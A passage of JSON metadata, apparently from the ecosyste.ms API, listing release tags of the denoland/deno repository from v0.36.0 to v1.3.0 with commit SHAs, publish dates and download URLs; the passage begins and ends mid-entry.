d%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha